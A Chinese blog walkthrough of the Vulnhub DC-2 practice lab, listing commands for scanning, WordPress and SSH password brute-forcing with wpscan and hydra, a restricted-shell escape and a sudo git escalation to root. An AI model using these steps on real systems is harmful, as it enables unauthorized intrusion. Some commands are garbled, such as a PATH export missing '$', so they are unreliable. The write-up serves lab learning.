Vulhub-DC-2靶场通关攻略

最新推荐文章于 2024-04-29 00:03:03 发布
最新推荐文章于 2024-04-29 00:03:03 发布
阅读量748 收藏 6
点赞数
分类专栏: 靶场与CTF系列 文章标签: linux debian php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51339377/article/details/123538184
版权 
arp-scan -l

nmap -sV -p- 192.168.109.140

也可以执行如下命令 可以探测目标主机是否存活 
nmap -T4 -sP 192.168.109.140

也可以尝试如下的命令  -A是主动扫描 -p设置的是端口  -oN可以把结果输出到文件 结果保存在root目标下 
nmap -T4 -A 192.168.109.140 -p 1-65535 -oN haha.txt
想要访问可以进入如下目录 
C:\Windows\System32\drivers\etc\hosts
kali中的hosts文件也需要修改 增加如下记录 
/etc/hosts

进入网页后 这个 wordpress的cms网站 这个网站除去漏洞 还是非常优秀的
此时直接访问相应的ip地址就可以直接访问相应的网站了  输入dc-2也可以
修改完hosts文件 然后可以访问以后 接下来可以尝试对其进行扫描  -o表示可以输出到一个文件中 -h后面可以写能被解析的域名 也可以直接写ip地址 
nikto -h dc-2 -o nihao.txt
发现了/wp-login.php  直接访问进入一个用户名和密码的登录位置 
http://dc-2/wp-login.php

接下来我们需要扫描发现wordpress的用户 
wpscan --url dc-2 -e u
(接下来是软件数据库更新问题的解决部分)
可以先下载包到本地 
wget http://blog.dsb.ink/wpscan/wp.zip
mv wp.zip /var/www/html/
如果kali无法直接下载 可以windows直接访问 http://blog.dsb.ink/wpscan/wp.zip 再把这个文件放到/var/www/html下 
cd /var/www/html
unzip wp.zip
dpkg -L wpscan | grep updater
/usr/share/rubygems-integration/all/gems/wpscan-3.8.1/lib/wpscan/db/updater.rb
vim /usr/share/rubygems-integration/all/gems/wpscan-3.8.1/lib/wpscan/db/updater.rb
按住shift+冒号 然后输入 set number回车 之后我们找到81行
之后我们改成本机地址 
接下来重启服务 
service apache2 start
然后再去更新  就可以更新成功了 
wpscan --update
之后再继续刚才的操作 
wpscan --url dc-2 -e u
扫描到了三个用户 admin jerry tom
根据flag1的提示 提示我们使用软件 cewl    会搜集可能的密码 行文习惯等 
cewl dc-2 -w pass.txt
vi username.txt

此时用户名和密码都到位了 
接下来可以 用工具 可以专门用来破解wordpress
其会自动定位到后台的登录地址 并进行穷举破解wordpress模板的用户名和密码 
wpscan --url dc-2 -U username.txt -P pass.txt
其实也可以使用神器burpsuite进行破解
接下来我们可以通过账户和密码尝试进行登录
Tom的账户登录以后并没有什么内容 所以就不做演示了
接下来既然有字典 不妨再使用工具hydra对ssh的密码进行一下穷举破解 看会不会有意外收获
而且此时ssh的端口不是默认的22  已经被管理员修改了 所以需要-s指定端口 
hydra -L username.txt -P pass.txt 192.168.109.140 ssh -s 7744
穷举成功获得ssh密码
接下来可以尝试登录ssh 
ssh tom@192.168.109.140 -p 7744
ls
发现权限不够 连cat都用不了
接下来要尝试提权 
echo $PATH   #看一下自己是什么命令行
ls usr/bin  #确定一下自己可以使用什么命令
vi flag3.txt
根据提示 接下来要使用su进行提权
以下命令  按下键盘的a 就可以调用/bin/sh命令行 
BASH_CMDS[a]=/bin/sh
发现依然被禁用掉了
接下来可以使用终极命令:  把高级权限的命令行也加到自己的path中
此时就可以使用cat了 
export PATH=PATH:/bin
export PATH=PATH:/sbin:/bin
可以尝试提权到jerry  
PS:经过尝试jerry的账户没有办法被直接ssh登录 但是通过tom的账户su后输入密码就可以成功切换账户 
su jerry
#adipiscing
cd ~    #回到自己的home目录
sudo -l  #查看可以以root权限使用什么命令
git提权  git在查看帮助文档的时候是可以敲命令的  在下面变白以后  命令前面加个感叹号即可 
sudo git -p --help  #这条命令有时候不能用
sudo git help config
此时已经提权到root了 可以执行root权限了
本质是借用git的root权限执行命令
Simon_Smith
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Vulhub-DC-1靶场通关攻略
weixin_51339377的博客
03-16 3591
靶场环境配置: 修改为usb1.0同时新建网络,把网络修改为NAT即可 首先开启靶机环境和kali黑客机器环境 通过NAT模式可以保证两者处于同一个内网环境中 切记 vmware和virtualbox的虚拟网卡可能网段不同 所以要保证kali和靶机在同一个网段 否则无法扫描到相应的靶机 1.第一步 通过kali中自带的一个工具 arp-scan进行内网存活主机探测 arp-scan -l 2.接下来可以借助nmap对目标进行扫描 其中 -sV服务指纹识别 可以探测目标系统...
vulnhub DC9——实战通关详细思路
m0_61506558的博客
11-06 984
(一)环境搭建(一)环境搭建在官网上下载.ova,直接打开就可以了。(二)主机发现。查看用户文件 ls -a查看root权限sudo -l查看历史命令 history 查看内核漏洞 uname -a
prime1--vulnhub靶场通关教程
m0_74402888的博客
04-29 2008
是一个常用的命令行工具,用于从或向服务器传输数据,支持多种协议,如 HTTP、HTTPS、FTP 等。如果你得到了任何正确的参数,就按照下面的步骤操作。漏洞查找工具,可以通过操作系统或cms的版本号搜索到相应漏洞,通过查看说明即可找到漏洞利用方法。之前扫到了ssh,http wordpress,那密码对应的是什么服务呢。在现实生活中的渗透测试中,我们应该使用我们的工具来深入挖掘一个网站。//查看location.txt文件,你将得到下一步的行动指示//vm 编辑--查看虚拟网络编辑器,看到靶机的网段。
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 (附靶机搭建教程)
qq_51577576的博客
03-14 8023
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
靶机通关 | vulhub-XXE靶机通关秘籍~
鱼溯的博客
09-20 526
vulhub-XXE靶机通关秘籍~
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-07 2403
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
vuInhub靶场实战系列-DC-6实战
最新发布
05-29
vuInhub靶场实战系列-DC-6实战
DC-DC PCB layout 指导.docx
06-18
DC-DC PCB Layout 指导 DC-DC PCB 布局是影响 DC-DC 转换器性能的关键因素之一。与 LDO 相比,DC-DC 电路的布局要求更高,因为它具有更高的噪声和更复杂的电路结构。因此,了解 DC-DC 布局的重要性和设计原则是非常...
DC-DC稳压电源应用电路设计攻略
01-12
在电子产品设计过 程中,电源通常是必不可少的部分,很多设备(尤其是使用电池的设备)的电源都是以DC-DC为主的。这些电源一般有三种拓扑结构,即人们熟知的buck、 boost和buck-boost(也叫inverting),分别用于...
AC-DC变换器_multisim_AC-DC_
09-29
标题中的“AC-DC变换器”是指交流(AC)到直流(DC)转换的电子设备,这是一种常见的电源转换技术,广泛应用于各种电子设备中。在本案例中,它与Multisim9软件相结合,用于模拟和分析电路设计。Multisim是一款强大的...
vulnhub靶机通关流程 第一关 me and my girlfrioend
qq_57774303的博客
12-04 157
最后找到了问题 但是我不得不吐槽一下virtualbox这个B虚拟化工具真的难用,连ip端口配置真的也是一言难尽,怎么连都连不上网段,然后不得不适用vware虚拟化工具,但是你将把靶场导入虚拟化工具的时候,会报错,这时候先重试,将靶场导入,然后修改网络的时候会报错卡死,是因为靶场太老了,需要手动设置更改适配器。在计算机网络中,以太网是一种常见的局域网(LAN)技术,它使用了一组标准来定义物理层和数据链路层的规范,以实现计算机之间的数据通信。在 nmap 中,选项 "-sC" 是一个用于启用脚本扫描的选项。
vulhub靶机通关)BoredHackerBlog: Social Network 2.0---hard_socnet2
yang1234567898的博客
01-07 3536
靶机下载地址:BoredHackerBlog: Social Network 2.0 ~ VulnHub 最终只拿到了本地权限,root权限的提升涉及逆向工程、缓冲区溢出的源码审计,还在摸索 首先,必须保证靶机、kali是通过桥接模式在同一网段 主机发现: 打开kali,通过ifconfig查看主机网段 nmap扫描网段: nmap 192.168.43.0/24 找到靶机ip,开放了22、80、8000端口 获取webshell: 先访问80端口,是
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解
qq_58091216的博客
09-25 989
13. 我们切换语句进入shell,执行whoami查看当前权限,执行ls查看当前目录下文件,切换到root目录,查看文件,发现cat thefinalflag.txt文件。15. 此时我们查看 /etc/passwd 文件,发现存在 flag4 用户,我们也可以使用 hydra 进行爆破。2) 查看数据库,切换到drupaldb数据库,查看查找默认的Drupal user 表,发现admin信息。5. 虚拟机开启之后需要登录,我们不知道密码,需要探活ip地址,网段知道:192.168.52.0/24。
Vulnhub通关手册》—— 03 Raven-1
weixin_53801131的博客
12-28 3664
背景概述: 下载地址:https://www.vulnhub.com/entry/raven-1,256/ 本次的靶机IP为100.10.10.132,将该IP地址添加到hosts文件内,映射到域名raven.local。 1. 信息收集 1.1 扫描目标主机IP 使用arp-scan -l命令进行局域网内部存活主机的扫描。 └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:27:90, IPv4: 100.10.10.129
Vulhub-KiraCTF靶场实战》
weixin_47118413的博客
03-01 293
靶机难度低级,漏洞也明细,通过上传漏洞结合文件包含漏洞获取shell,在后提权,在通过sudo -l发现find提权,最后用find命令成功提权。
Web安全——穷举爆破上篇(仅供学习)
钟言的博客
09-02 4538
本篇为Web安全的穷举篇,详细内容包含了二、常见的服务 1、burpsuite 穷举后台密码 2、burpsuite 对 webshell 穷举破解密码3、有 token 防御的网站后台穷举破解密码3.1 burpsuite 设置宏获取 token 对网站后台密码破解3.2 编写脚本获取token 对网站后台密码破解4、针对有验证码后台的穷举方法 4.1 cookie 不存在不验证绕过 4.2 后台登录验证码没销毁进行穷举4.3 网站后台验证码识别穷举密码 5、phpmyadmin 密码穷举 6、一句话等等
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Simon_Smith

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值